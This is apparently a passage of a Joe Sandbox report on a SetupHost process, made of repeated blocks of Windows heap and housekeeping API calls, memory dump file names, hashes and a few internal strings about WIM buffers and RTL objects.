                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A05BBA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A05BC1
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00A05BDD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00A05BEA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 00A05BF1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocByteCharFreeMultiWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 586017212-0
                                                                                                                                                                                                                • Opcode ID: fae272a286574d21a7806ea28f70a495d61f407ff0211467cf764e22d6b98250
                                                                                                                                                                                                                • Instruction ID: 770b9810019464d1549bb5774379b3505ee9e7fba876977d850ffd3be9858dc2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fae272a286574d21a7806ea28f70a495d61f407ff0211467cf764e22d6b98250
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35115E7AE047166BD7209BF99C14BBB7AADDB95750F144025FD46C71C0FA61CD0186B0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000054), ref: 009EB3E2
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009EB3E9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EB3F8
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EB40E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLast$AllocProcess
                                                                                                                                                                                                                • String ID: WimBufferToHexString
                                                                                                                                                                                                                • API String ID: 4104531043-2611935240
                                                                                                                                                                                                                • Opcode ID: 8f62d41b405824eb8485d334634ffd44db9f3f5ac4a4f9955d8ff20b1cdc74ef
                                                                                                                                                                                                                • Instruction ID: 16406bc5f7286f256f3352a5d8eff92766aa3d6a163cf6fc9b94699d7a2650fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f62d41b405824eb8485d334634ffd44db9f3f5ac4a4f9955d8ff20b1cdc74ef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8421F675610362ABD7128F9AD845BAFB6A8EF48750B018225FD04DB3B2E730CC01D7A4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,?,009DE253), ref: 009E88A0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009DE253), ref: 009E88B6
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009DE253), ref: 009E88BD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009DE253), ref: 009E88F7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009DE253), ref: 009E88FE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$CriticalDeleteSection
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4183614560-0
                                                                                                                                                                                                                • Opcode ID: 43108dd14908c6b6cae534b568b7c8c795f22f12e70619308be015da166d260b
                                                                                                                                                                                                                • Instruction ID: 9124dc1d91f896e97c86f631a216c6029f8d6c23d5ea4baaf9853fd423fcd35b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43108dd14908c6b6cae534b568b7c8c795f22f12e70619308be015da166d260b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A115131A00612AFCB11DBD6D888B9BB7BDFB48351F510155E91D93950DB70EC51CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009BE4C7
                                                                                                                                                                                                                • RtlGetVersion.NTDLL ref: 009BE4DC
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009BE4F6
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009BE4FF
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000), ref: 009BE50C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$LastStatusVersionmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1487908882-0
                                                                                                                                                                                                                • Opcode ID: 64d44c9b143c11ef3ca339173b14fe2ce407c843bd1a43f5e35a60bd055740de
                                                                                                                                                                                                                • Instruction ID: 849a0284b821a9a89007716d93edf75d3791a61cf32365f95f0c6d298ed90b34
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64d44c9b143c11ef3ca339173b14fe2ce407c843bd1a43f5e35a60bd055740de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3114E71A0030CABDB309F619D49EEB777DEB89721F000479BA4593141EAB48D418B50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009E994B
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009E9952
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 009E998D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E9994
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • WIM %s, offset %.8x%.8x, length %x, xrefs: 009E996A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID: WIM %s, offset %.8x%.8x, length %x
                                                                                                                                                                                                                • API String ID: 756756679-2423155847
                                                                                                                                                                                                                • Opcode ID: eab5cf855653a07fa2e08f94065defb5df58628074e73e1f3f89f67d4419ccc4
                                                                                                                                                                                                                • Instruction ID: a1fa43a78bfb30c32bd843789f425010dbfee2b9cda94f57389f71b5286503ec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eab5cf855653a07fa2e08f94065defb5df58628074e73e1f3f89f67d4419ccc4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6301CE72800614BBCB25DFD9CC49EDEBB79FF88351F048129F90993150DA309D1287A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,23FAFFD7,0052AD90,00000000,00000000,00000000,00A11005,000000FF,?,00A00189), ref: 00A0027D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A00189), ref: 00A00284
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,?,00A00189), ref: 00A0029E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A00189), ref: 00A002A5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00A00189), ref: 00A002B5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A00189), ref: 00A002BC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                • Opcode ID: 4e49a407d5729e64cf4c335d6c7012bd72b809eb1f414f874c0062919f5e3a50
                                                                                                                                                                                                                • Instruction ID: 143318b656d47bd31028379d53dbc7d8ff437389d3acc5c6b9c5985a4bceb9d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e49a407d5729e64cf4c335d6c7012bd72b809eb1f414f874c0062919f5e3a50
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A01C476604604ABCB11DBA4DC49FEF7BB8EB99791F048569F502C72D0CF348801C760
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,009E04FD,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000), ref: 009E25C0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E0E70), ref: 009E25C7
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00A16788,?,00000000,009E04FD,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000), ref: 009E25DD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15), ref: 009E2601
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E0E70), ref: 009E2608
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00A16788,?,009E0E70,009E0E70,?,009E0EB4,00000000,00A16DCC,009E0F24,?,?,00000000,?,009E0B15,?), ref: 009E262D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CriticalFreeProcessSection$EnterLeave
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 138501981-0
                                                                                                                                                                                                                • Opcode ID: b1bd050ecd9776cf1968c4d735bed362ace02f3414f759df5fd7125c2fe8a63c
                                                                                                                                                                                                                • Instruction ID: bef5e6745680235e458cabed518496fd37eea3988361961d1935e49b49d7937f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1bd050ecd9776cf1968c4d735bed362ace02f3414f759df5fd7125c2fe8a63c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 170196322453509BCB628FE5AC48BAA777CEB94B65F29865EF40586190DB704C438750
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,009E7282,?,00000000,?,009E76BB,?,?), ref: 009E8828
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009E7282,?,00000000,?,009E76BB,?,?,?,?), ref: 009E882F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000018,?,009E7282,?,00000000,?,009E76BB,?,?,?,?), ref: 009E883E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009E7282,?,00000000,?,009E76BB,?,?,?,?), ref: 009E8845
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009E7282,?,00000000,?,009E76BB,?,?,?,?), ref: 009E8870
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E7282), ref: 009E8877
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1864747095-0
                                                                                                                                                                                                                • Opcode ID: 5eafd4897898745efd982bbba9b7f789940f86d218a6b36054e1bd50e4762fd4
                                                                                                                                                                                                                • Instruction ID: 4de04de1fa9d305177d46f6dbb8dd4cbefe097d4ec6efd3225e453353a082f87
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eafd4897898745efd982bbba9b7f789940f86d218a6b36054e1bd50e4762fd4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E70184B6900744ABC722DFE6DC48D9FBABDFB88751B14856CA516D3210DB70DE018B60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,009E71F2), ref: 009E87A3
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000004,00000000,?,?,?,?,009E71F2), ref: 009E87AA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000018,?,00000004,00000000,?,?,?,?,009E71F2), ref: 009E87B9
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000004,00000000,?,?,?,?,009E71F2), ref: 009E87C0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000004,00000000,?,?,?,?,009E71F2), ref: 009E87EB
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000004), ref: 009E87F2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1864747095-0
                                                                                                                                                                                                                • Opcode ID: eb8b72eca7a616bbd0649a2757daa8bda044d44928cd81d1d678adec4b580c5b
                                                                                                                                                                                                                • Instruction ID: 5b5a618885d63c00823f1546738632f30ec13457f762724d2139d6fa040b0697
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb8b72eca7a616bbd0649a2757daa8bda044d44928cd81d1d678adec4b580c5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C801C076900305ABC321CFE6CC88A9FBABCFB88741B14891CA50A93200DF71DE018BA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000000C,?,?,?,?,009CFEA4,?,?), ref: 009D0137
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,009CFEA4,?,?), ref: 009D013E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • Windows::Rtl::CRtlObjectTypeDescription<class MicrodomWriterImplementation::CMicrodomWriter>::CreateTearoff, xrefs: 009D0173
                                                                                                                                                                                                                • onecore\internal\base\inc\rtl_object_library.h, xrefs: 009D0168
                                                                                                                                                                                                                • NewTearoff.Allocate(), xrefs: 009D0181
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                • String ID: NewTearoff.Allocate()$Windows::Rtl::CRtlObjectTypeDescription<class MicrodomWriterImplementation::CMicrodomWriter>::CreateTearoff$onecore\internal\base\inc\rtl_object_library.h
                                                                                                                                                                                                                • API String ID: 1617791916-3018160994
                                                                                                                                                                                                                • Opcode ID: 11e5e519727261b2310a9a607da7cbdf7150762aaff25451f0a616b8671a9e0d
                                                                                                                                                                                                                • Instruction ID: 9e64eab29275831eac57d7c962baa852b6b68de6d052b390c997b2cf9a9f9921
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11e5e519727261b2310a9a607da7cbdf7150762aaff25451f0a616b8671a9e0d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B11CB75A04304DBCB10AF98CC88BAEBBF8BF95314F04C46AE8055B341C7B49905CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 009E9781
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E9788
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,009DE643,?,00000000), ref: 009E97AD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009DE643), ref: 009E97B4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,009DE643,?,00000000), ref: 009E97C4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009DE643), ref: 009E97CB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                • Opcode ID: 1e69fba5372a49561e19901057581f930a783428d7866614a21af9afa5df515e
                                                                                                                                                                                                                • Instruction ID: c84a6edaf120363777091ad26891dc146294497970ed5c70151b00039d01a0c5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e69fba5372a49561e19901057581f930a783428d7866614a21af9afa5df515e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4018C32614301AFD721DFAADC88B9A7BBCFB48752F2554A9E44996090D7719C45CA10
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000000C,?,?,?,?,009CD7C4,?,?), ref: 009CDA55
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,009CD7C4,?,?), ref: 009CDA5C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • onecore\internal\base\inc\rtl_object_library.h, xrefs: 009CDA86
                                                                                                                                                                                                                • NewTearoff.Allocate(), xrefs: 009CDA9F
                                                                                                                                                                                                                • Windows::Rtl::CRtlObjectTypeDescription<class MicrodomImplementation::CMicrodom>::CreateTearoff, xrefs: 009CDA91
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                • String ID: NewTearoff.Allocate()$Windows::Rtl::CRtlObjectTypeDescription<class MicrodomImplementation::CMicrodom>::CreateTearoff$onecore\internal\base\inc\rtl_object_library.h
                                                                                                                                                                                                                • API String ID: 1617791916-2277900074
                                                                                                                                                                                                                • Opcode ID: 2279949c02f4f4db18927c039c5065930b2d3fcbd73181200359a3d60c7922bd
                                                                                                                                                                                                                • Instruction ID: e1d75826fec9675ec114c5e2563e41bee1ad0524b21ea758c476009c7c32511f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2279949c02f4f4db18927c039c5065930b2d3fcbd73181200359a3d60c7922bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8711A1B5A05304DBDB10AF98C888BAEBBF8FF44304F15C069E8146B351C7B49D05CBA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A0F272
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00A0F281
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A0F28A
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A0F293
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00A0F2A8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                • Opcode ID: ad706181138109a847772ffec42e4c44d59f508409ad5bd29ef1238fc9780df9
                                                                                                                                                                                                                • Instruction ID: 543c46d0bc9f18c0bd6b60334d3550a51abf4b1faea1f01d9453c0492759f168
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad706181138109a847772ffec42e4c44d59f508409ad5bd29ef1238fc9780df9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4911C579D15209EFCF10DFF8E9486DEBBF4EB58311F6588A6E802E7254E6309A419B40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
